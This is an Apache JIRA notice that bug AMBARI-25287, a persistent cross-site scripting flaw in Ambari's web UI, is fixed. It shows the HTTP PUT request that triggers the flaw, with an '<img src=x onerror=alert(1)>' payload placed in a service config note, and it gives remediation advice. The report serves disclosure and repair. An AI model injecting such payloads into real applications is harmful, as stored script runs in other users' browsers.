[ https://issues.apache.org/jira/browse/AMBARI-25287?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Dmytro Grinenko resolved AMBARI-25287.
--------------------------------------
    Resolution: Fixed

> Persistent Cross Site Scripting (XSS) in Ambari
> -----------------------------------------------
>
>                 Key: AMBARI-25287
>                 URL: https://issues.apache.org/jira/browse/AMBARI-25287
>             Project: Ambari
>          Issue Type: Bug
>          Components: ambari-web
>    Affects Versions: 2.6.2
>            Reporter: Andrii Tkach
>            Assignee: Andrii Tkach
>            Priority: Critical
>              Labels: pull-request-available
>          Time Spent: 0.5h
>  Remaining Estimate: 0h
>
> Below is the HTTP Request and Response issued when a user submits a note containing a JavaScript after modifying some configuration in "Tez" service.
>
> HTTP Request:
>
> PUT /api/v1/clusters/<env> HTTP/1.1
> Host: xyz601:8080
> Content-Length: 199
> Accept: application/json, text/javascript, */*; q=0.01
> Origin: http://xyz601:8080
> X-Requested-With: XMLHttpRequest
> X-Requested-By: X-Requested-By
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
> Referer: http://xyz:8080/
> Accept-Encoding: gzip, deflate
> Accept-Language: en-US,en;q=0.9
> Cookie: AMBARISESSIONID=vfiy4336mxwl1k5ehd6jrz43i
> Connection: close
>
> {"Clusters":{"desired_service_config_versions":{"service_config_version":4,"service_name":"TEZ","service_config_version_note":"Created from service config version V4\n<img src=x onerror=alert(1)>"}}}
>
> Remediation Recommendations
>
> Restrict all input passed to the application to valid, whitelisted content, and ensure that all response/output sent by the server is HTML/URL/JavaScript encoded, depending on the context in which the data is used by the application.
>
> The remediation should not attempt to blacklist content and remove, filter, or sanitize it. There are too many types of encoding to get around filters for such content.
>
> We strongly recommend a positive security policy that specifies what is allowed. Negative or attack signature based policies are difficult to maintain and are likely to be incomplete.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)